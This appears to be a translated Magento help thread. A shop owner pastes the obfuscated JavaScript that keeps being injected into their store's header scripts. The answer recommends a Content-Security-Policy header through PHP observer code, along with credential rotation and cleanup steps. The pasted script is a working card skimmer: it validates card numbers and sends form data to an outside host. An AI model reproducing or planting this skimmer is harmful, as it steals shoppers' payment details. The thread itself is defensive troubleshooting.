我们的商店反复感染恶意软件。它是一个JavaScript代码。
每次发生这种情况时,我都可以在以下位置的后端中找到并删除代码:
系统->常规->设计-> HTML头->其他脚本
我们使用Magento 1.9.3.8。我还更改了管理员密码,但这无济于事。
我不是开发人员,所以我想知道如何查找此代码,我需要自己删除它。<script>(function(){(function ATMZOW(){var S7HYO6=String.fromCharCode(115,112,108,105,116,44,116,111,83,116,114,105,110,103,44,106,111,105,110,44,108,101,110,103,116,104,44,99,104,97,114,67,111,100,101,65,116,44,102,114,111,109,67,104,97,114,67,111,100,101)[String.fromCharCode(115,112,108,105,116)](String.fromCharCode(44));function KGOOOF(W424TI){W424TI=W424TI[S7HYO6[0]]("");var J8TRBF=ATMZOW[S7HYO6[1]]()[S7HYO6[0]](/\(| | |\n|\r|;|}|{|\)/)[S7HYO6[2]]("")[S7HYO6[3]][S7HYO6[1]]()[S7HYO6[0]](""),GPXM23=0,YB73OF="",I8649J="",F4ZOWP=0,ABC8ON;for(ABC8ON=0;ABC8ON<W424TI[S7HYO6[3]];ABC8ON=ABC8ON+2){if(J8TRBF[S7HYO6[3]]==GPXM23){GPXM23=0;}I8649J=parseInt(W424TI[ABC8ON]+W424TI[ABC8ON+1],30)-J8TRBF[GPXM23][S7HYO6[4]](0)-F4ZOWP;YB73OF+=String[S7HYO6[5]](I8649J);F4ZOWP=I8649J;GPXM23++}return YB73OF}S7HYO6=KGOOOF("215i8l8s7q7m8q8l8l8q9d9c7m828m7m8b7q7m8h8l5g3n6m8q979g9e7376938k8k8f92736j8s9c946q6j929e9d9c986r6e6i6s8p8n6o3n5d5d5t613h3h5n8q8m8o94975f588c8h7a7s948s97837q979c8s8q8s8q5p5h90908j8g9289879193878h9r967o80925t4p4p5q985l5m989f928r965r3d3d3d3f5g8b5a48425f959j99987i5c4p3i60918o90929f5r5f959c8s5j487o7g425o97999d918i8m9b9e5r5q989590925r5t8s8i8l8q975k588s9j8o878i7k7s908q9d5r5t908m968t5g5m8q918q927r6r76704h588k935j5g908r8c928e7s5d5r8s8h7m7g8l8r5c5r9c847s9b95927m758r935c5l8m8n8l5c5k8m5b5d919c917h7g8i8m7m7n8s8c5c5e908q898s947b7i8o8r8l8m9b635g8q9a938q9b7r7e8e8o9a925c5q9e905a5k8l908q8e")[S7HYO6[0]](String.fromCharCode(10));function XYKV3W(){var J8TRBF=arguments,GPXM23=0,ABC8ON;for(ABC8ON=0;ABC8ON<J8TRBF.length;ABC8ON++)GPXM23+=J8TRBF[ABC8ON];return S7HYO6[GPXM23]}(function(){var FEOY7B=XYKV3W(1,1,-2),HSNKEN,EVEDX9=document,ZH09E4=XYKV3W(1,2,2,-4),I8NBM7=XYKV3W(5,-3),HHP3QV=I8NBM7[XYKV3W(5,42,-26)](XYKV3W(7,-7,3))[0],YC5N3S=XYKV3W(2,2)+Math[XYKV3W(22,32,-32)](),EQS83E=XYKV3W(4,10,-9),HO8J5B=XYKV3W(11,-2,-2,-1),SQXXSJ=XYKV3W(8,-2,1),W2VT2I=XYKV3W(1,4,3)[XYKV3W(26,-12,7)](XYKV3W(18,-11,2));function JKFJ9I(KAVJ15,YTH96D){KAVJ15[SQXXSJ]?KAVJ15[SQXXSJ](YTH96D,TOVTBZ,false):KAVJ15[XYKV3W(26,-3)](XYKV3W(17,13,15,-35)+YTH96D,TOVTBZ)}function XFONKN(KAVJ15){var QOPJZJ=KAVJ15[XYKV3W(44,-19,-1)],PTDYD2;KAVJ15=KAVJ15[ZH09E4](XYKV3W(8,3));for(PTDYD2=0;PTDYD2<KAVJ15[XYKV3W(2,4)];PTDYD2++)if(QOPJZJ==KAVJ15[PTDYD2][XYKV3W(49,-32,7)])QOPJZJ=KAVJ15[PTDYD2][XYKV3W(35,2,49,-61)];return encodeURIComponent(QOPJZJ)}function TOVTBZ(){var KAVJ15=EVEDX9[XYKV3W(23,31,44,-72)]||EVEDX9[ZH09E4](XYKV3W(3,-9,-15,33)),PTDYD2,TDKZU2=XYKV3W(1,-1,-1,1),E;HSNKEN=XYKV3W(1,-1,0);for(PTDYD2=0;PTDYD2<KAVJ15[HO8J5B];PTDYD2++){if(HHP3QV[XYKV3W(18,-31,40)](EQS83E+KAVJ15[PTDYD2][XYKV3W(11,38,-21)][XYKV3W(9,41,-21)]()+EQS83E)>=0&&KAVJ15[PTDYD2][XYKV3W(44,-20)]){if(PYA434(KAVJ15[PTDYD2][XYKV3W(16,7,1)]))HSNKEN=KAVJ15[PTDYD2][XYKV3W(27,29,-32)];TDKZU2+=XYKV3W(15,23,-25)+(KAVJ15[PTDYD2][XYKV3W(21,52,-43)]||KAVJ15[PTDYD2][XYKV3W(36,-5)]||XYKV3W(9,-13,14,4)+PTDYD2)+XYKV3W(28,-13)+XFONKN(KAVJ15[PTDYD2])}}if(FEOY7B!=TDKZU2&&HSNKEN){FEOY7B=TDKZU2;GD67HI()}}function GD67HI(){var YTH96D=XYKV3W(11,5),UB8JBF=String;YTH96D+=UB8JBF[XYKV3W(15,17)](118,97,109,98,101,114,108,111,46,99,111,109)+YTH96D[6]+W2VT2I[0]+YTH96D[6]+W2VT2I[3]+YTH96D[6]+W2VT2I[2]+EQS83E+W2VT2I[1];var KAVJ15=EVEDX9[XYKV3W(45,26,-64,26)](XYKV3W(23,18,-24)),TDKZU2=EVEDX9[ZH09E4](XYKV3W(15,2,1))[0];KAVJ15=TDKZU2[XYKV3W(19,22,-7)](KAVJ15,null);KAVJ15[XYKV3W(55,-43,56,-33)]=YTH96D+XYKV3W(13,-19,17,8)+YC5N3S+FEOY7B+XYKV3W(26,15,-28)+I8NBM7[11]+HHP3QV[11]+XYKV3W(22,-20,-12,25)+HSNKEN}function PYA434(BQ1CNA){var YTH96D=0;BQ1CNA=BQ1CNA[XYKV3W(30,-9)](XYKV3W(1,1,1,-3));if(BQ1CNA[HO8J5B]<13||BQ1CNA[HO8J5B]>19)return false;for(var PTDYD2=BQ1CNA[HO8J5B]-1;PTDYD2>=0;PTDYD2--){if(!BQ1CNA[PTDYD2][XYKV3W(12,24)](/[0-9]/))return false;if(!(PTDYD2%2)){YTH96D+=(BQ1CNA[PTDYD2]*2>9)?BQ1CNA[PTDYD2]*2-9:BQ1CNA[PTDYD2]*2}else{YTH96D+=BQ1CNA[PTDYD2]*1}}return!(YTH96D%10)}function BQ1CNA(){var KAVJ15=EVEDX9[XYKV3W(9,13,4)]||EVEDX9[ZH09E4](XYKV3W(24,-22,19,-9)),PTDYD2;for(PTDYD2=0;PTDYD2<KAVJ15[HO8J5B];PTDYD2++){if(I8NBM7[XYKV3W(4,23)](EQS83E+KAVJ15[PTDYD2][XYKV3W(54,45,55,-126)][XYKV3W(19,47,-37)]()+EQS83E)>=0&&!KAVJ15[PTDYD2][YC5N3S]){KAVJ15[PTDYD2][YC5N3S]=1;JKFJ9I(KAVJ15[PTDYD2],XYKV3W(23,-2,-1))}}setTimeout(BQ1CNA,99)}BQ1CNA()}())}())}())</script>
答案 0 :(得分:0)
1 /针对讨厌的脚本
我使用了非常有效的解决方案。
营销机构不喜欢它,但是他们通常并不关心安全性。
它被命名为Header Content-Security-Policy。
就像防火墙一样。使用此工具,所有想要在您的网站上执行任何操作的服务器都必须由您分配。
操作起来并不容易。除了一个示例,您还必须在其中添加自己的权限。
在app/code/local/NAMESAPECE/MODULE/etc/config.xml
...
<frontend>
<events>
<controller_action_predispatch>
<observers>
<NAMESAPECE_MODULE_controller_action_predispatch>
<class>NAMESAPECE_MODULE/observer</class>
<method>processPreDispatch</method>
</NAMESAPECE_MODULE_controller_action_predispatch>
</observers>
</controller_action_predispatch>
</events>
</frontend>
...
在app/code/local/NAMESAPECE/MODULE/Model/Observer.php
<?php
class NAMESAPECE_MODULE_Model_Observer
{
public function processPreDispatch(Varien_Event_Observer $observer)
{
/** @var Mage_Core_Controller_Varien_Action $controller */
$controller = $observer->getControllerAction();
/** @var Mage_Core_Controller_Response_Http $response */
$response = $controller->getResponse();
$response->setHeader('X-XSS-Protection', '1; mode=block')
->setHeader('X-Content-Type-Options', 'nosniff');
$contentSecurityPolicy = "default-src 'self';";
$contentSecurityPolicy .= "script-src 'self' 'unsafe-inline' 'unsafe-eval' https://bam.nr-data.net http://code.jquery.com https://ajax.cloudflare.com http://ajax.cloudflare.com https://cdnjs.cloudflare.com https://*.facebook.com https://*.facebook.net http://*.facebook.com http://*.facebook.net http://*.googleapis.com https://*.googleapis.com http://www.google-analytics.com https://www.google-analytics.com http://*.google.com https://*.google.com https://*.googletagmanager.com https://*.googleadservices.com https://*.criteo.net https://*.criteo.com http://bat.bing.com https://bat.bing.com https://*.google.fr https://*.gstatic.com/;";
$contentSecurityPolicy .= "style-src 'self' 'unsafe-inline' fonts.googleapis.com https://tagmanager.google.com;";
$contentSecurityPolicy .= "img-src 'self' http://*.facebook.com http://*.paypal.com http://www.google-analytics.com http://*.gstatic.com http://*.googleapis.com https://*.fbcdn.net http://*.google.com https://*.google.com http://*.google.fr https://*.google.fr http://*.google.be https://*.google.be http://*.google.nl https://*.google.nl http://*.google.es https://*.google.es http://*.google.de https://*.google.de http://*.google.co.uk https://*.google.co.uk https://*.facebook.com https://*.paypal.com https://www.google-analytics.com https://*.gstatic.com https://*.googleapis.com http://*.bing.com;";
$contentSecurityPolicy .= "connect-src 'self' https://www.google-analytics.com;";
$contentSecurityPolicy .= "font-src 'self' http://fonts.gstatic.com https://fonts.gstatic.com;";
$contentSecurityPolicy .= "object-src 'self';";
$contentSecurityPolicy .= "media-src 'self';";
$contentSecurityPolicy .= "frame-src 'self' https://tr.snapchat.com http://*.youtube.com http://*.facebook.com http://*.google.com http://*.google.fr https://*.youtube.com https://*.facebook.com https://*.google.com https://*.google.fr;";
$contentSecurityPolicy = rtrim($contentSecurityPolicy, ';');
$response->setHeader('Content-Security-Policy', $contentSecurityPolicy);
}
}
然后,在前端导航时查看控制台。您会看到谁在尝试执行某些操作,并且已被内容安全策略标头阻止。
2 /在您的情况下,您的管理员也受到威胁
更改您的管理员密码和电子邮件地址,删除所有其他管理员帐户
更改数据库密码,确保MySql用户只能从本地网络访问MySql
删除phtml中的config字段的调用。复制到设计文件夹app/design/frontend/base/default/template/page/html/head.phtml
中以删除<?php echo $this->getIncludes() ?>
检查所有模块,删除不需要的模块
如果问题仍然存在,则应审核所有代码/服务器。